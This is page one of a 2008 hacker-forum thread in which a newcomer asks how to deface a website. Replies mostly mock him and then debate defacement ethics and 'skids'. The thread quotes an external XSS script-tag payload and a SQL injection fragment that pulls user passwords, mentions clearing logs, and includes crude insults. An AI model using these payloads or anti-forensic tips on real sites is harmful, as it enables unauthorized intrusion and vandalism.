Follow us on Twitter!
It is never to LATE to become what you never WERE.
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 23
Guests Online: 22
Members Online: 1

Registered Members: 82885
Newest Member: ConiBE
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Page 1 of 3 1 2 3 >
Author

website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-08-08 21:13
I need some guidance on what the best "technique" or attack method is the most efficient when trying to deface a website? XSS perhaps


Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-08-08 21:17
I have a feeling you are gonna get flamed.....

If I was less lazy you'd be on the grill already.


Author

RE: website defacement

clone4
Member



Posts: 586
Location: He is back and he's bad!
Joined: 25.11.07
Rank:
Mad User
Posted on 21-08-08 21:23
best technique = exploit vulnerabilities that you find...

Oh and almost forgot; Fuck off ! Wink


[img][/img]img164.imageshack.us/img164/5713/perlvl0.jpg

clone4.freehostia.com/ubuntu_3.png
spyware - "They see me trollin'..."
<yaragn> ever seen that movie? The Matrix?
<yaragn> with those green lines of flying text?
<yaragn> *THAT'S* Perl

clone_4@hotmail.com
Author

RE: website defacement

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 21-08-08 21:23
Enter this in your URLbar, it's an old XSS technique to overflow the site and get root (=admin).


Code
javascript:while(1){alert(/get_root/)};






Copy that exactly, it'll take a few minutes though, should be like 10 minutes.

Edit: Guys, don't be so mean to the new guy. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future...



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce

Edited by spyware on 21-08-08 21:25
Author

RE: website defacement

Futility
Member



Posts: 725
Location: USA
Joined: 17.12.07
Rank:
God
Posted on 21-08-08 21:29
tuchezviper wrote:
I need some guidance on what the best "technique" or attack method is the most efficient when trying to deface a website? XSS perhaps

You sir, are an idiot.

Why would you ask a question you already knew the answer to? XSS is positively the best way to hack a site because no one knows about it and it's extremely hard to patch. If you can find a site with an XSS hole in it, you're practically guaranteed to get a nice hack in that everyone here will be proud of. You're on the right track. Keep up the good work! You're obviously going to be a great addition to this prestigious community.


i252.photobucket.com/albums/hh11/zanimabean/Zim.png
Futility91@hotmail.com Futility91
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-08-08 22:42
spyware wrote:

Edit: Guys, don't be so mean to the new guy. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future...

I agree.I mean after all this is a place where we are supposed to learn and practice besides we don't know if doing this can give him a self esteem crisis
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 00:40
I really love how spyware and Futility really want to reach out and help the newbies. It's really inspiring to know that we really have great people on this site *sheds a tear and starts to clap*


Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 05:51

Edit: Guys, don't be so mean to the new guy. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future...


Then what was that you pulled on me on the other topic?
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 17:37
You should take that hacker symbol out of your sig, skid. You obviously don't understand what it means.
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 20:07
Personally I think that defacing a site is lame! ESPECIALLY with xss i mean common how hard is it <scirpt src=http://site.com/xss_deface.js></script> see its lame! Also What is the point of a deface so you can advertise that you were smart enough to get into sencitave areas of a site? Excuse me if im wrong BUT DOSENT THAT NORMALLY THROW UP RED FLAGS? (Ill always laugh at idiots who deface and dont clear the logs or use a proxy)

Moral of the story. Dont be GAY!


Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 22:16
exidous wrote:
Personally I think that defacing a site is lame! ESPECIALLY with xss i mean common how hard is it <scirpt src=http://site.com/xss_deface.js></script> see its lame! Also What is the point of a deface so you can advertise that you were smart enough to get into sencitave areas of a site? Excuse me if im wrong BUT DOSENT THAT NORMALLY THROW UP RED FLAGS? (Ill always laugh at idiots who deface and dont clear the logs or use a proxy)

Moral of the story. Dont be GAY!


And yet, people bitch every day saying that hackers are no good little punks with not morals or common decency.

.... hmm....

Good to know people that can barely talk properly are wrong about hackers.




{also, I like this moral, but that doesn't mean i've learned from it}


Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 22:40
This is neither condoning, or excusing website defacement simply an argument for you to ponder.

Why does a defacer always have to be a skid?

The best hackers in the world are more then capable of defacing website. Im not saying that they do, but definetly can. And if they did so would that then make them a skid?

Sure skids do often deface websites, by looking for the latest vulnerability and searching the web until they find one.

So my argument is simply you cannot nessisarily judge a skid by the act of defacement, only in the way in which the defacement was achieved.




Edited by on 22-08-08 22:42
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 23:23
I almost bet you 60% of defacers use MILWORM *that is leaving brown skiddy marks in the internets underwear!*


Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 23:26
exidous wrote:
I almost bet you 60% of defacers use MILWORM *that is leaving brown skiddy marks in the internets underwear!*


I would say more then that percentage and agree with you, still doesnt change my argument. Also, milw0rm is a great collection of vulnerabilites, and to never use is just taking a valuable resource and throwing it away.


Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-08-08 23:42
exidous wrote:
I almost bet you 60% of defacers use MILWORM *that is leaving brown skiddy marks in the internets underwear!*


You aren't really a skiddy if you understand what the exploit does. And, also, defacing could be used as a way to alert administrators about vulnerabilities, If you e-mail them multiple times, the vulnerability is still there, you are obviously going to fix the vulnerability for them. But, if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to emails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-08-08 01:03
I think your twisting what I say. Milworm is a good resource. But think of the people that think there 1337 because they get a google dork. and then they can copy paste (claim the fame) OH man thats 1337. I have met many people that use milworm just to look cool, Post defaces, And claim the fame!

They have no clue what the exploit does how it works or even why it does. Example select concat(user,0x3a,password) from phpbb_users--
Ok so how did they come to find that table phpbb_users exists? Did they enumerate the tables? No! Can they enumerate the tables, probably not!

Same for the columns How did they come to find that there is a column user and password? Did they enumerate those, NO! They got the WHOLE INJECTION FROM MILWORM! And thats just not 1337 its skiddy. Because they actully have no clue how to do what someone else has given them. And they think there "Hackers". And thats just one example. I can give many more. Hell go to milworm and have a look. Tell me how 1337 you would be if you just took someone eleses work and clamed it as yours?

Maby thats the problem with todays "Hackers" they all want someone else to do the work for them so they can claim it. No effort on learning the exploit inside and out.

Now dont get me wrong I go to milworm at times. But I go there looking to learn something new. Then understand how and why it works. So I can do the same thing that the author of the exploit did, With my own techniques and efforts. Not some copy paste skid terd!




Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-08-08 13:48
hacker2k wrote:

You aren't really a skiddy if you understand what the exploit does. And, also, defacing could be used as a way to alert administrators about vulnerabilities, If you e-mail them multiple times, the vulnerability is still there, you are obviously going to fix the vulnerability for them. But, if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to emails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.


And here's the thing, its not your responsibility to fix the code for them. If they don't respond to emails that you send them, they don't have to. You're not in charge of their actions. If they choose not to respond, who are you to punish them?
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-08-08 14:17
It's not punishment. You fixed their vulnerability and the site is defaced for a few minutes. Just make a backup and link to the backup so that people that need the site can still get to it. You emailed them exactly what the vulnerability was so they know what not to do anymore. As far as I'm concerned, it's a service that they are getting for free.
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-08-08 14:49
yes because skid who defaces creates a backup and links to it
its not a service dont try and fool yourself
people deface sites for nothing more then an ego boost and to show off how l337 they are




Edited by on 23-08-08 14:50
Author

RE: website defacement


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-08-08 14:56
tch0rt wrote:
yes because skid who defaces creates a backup and links to it


Skid's are the ones you scare to death by threatening to prosecute so that you get rid of an 31337-retard Grin. They're there for entertainment. Also, if skid defaces your site, you don't deserve to have a site.Pfft

As for the service thing, the only people that try to get an ego boost are skids. Skids don't gain anything for using a script to deface a website (except to their u83r 1337 friends).

Edited by on 23-08-08 14:58
Page 1 of 3 1 2 3 >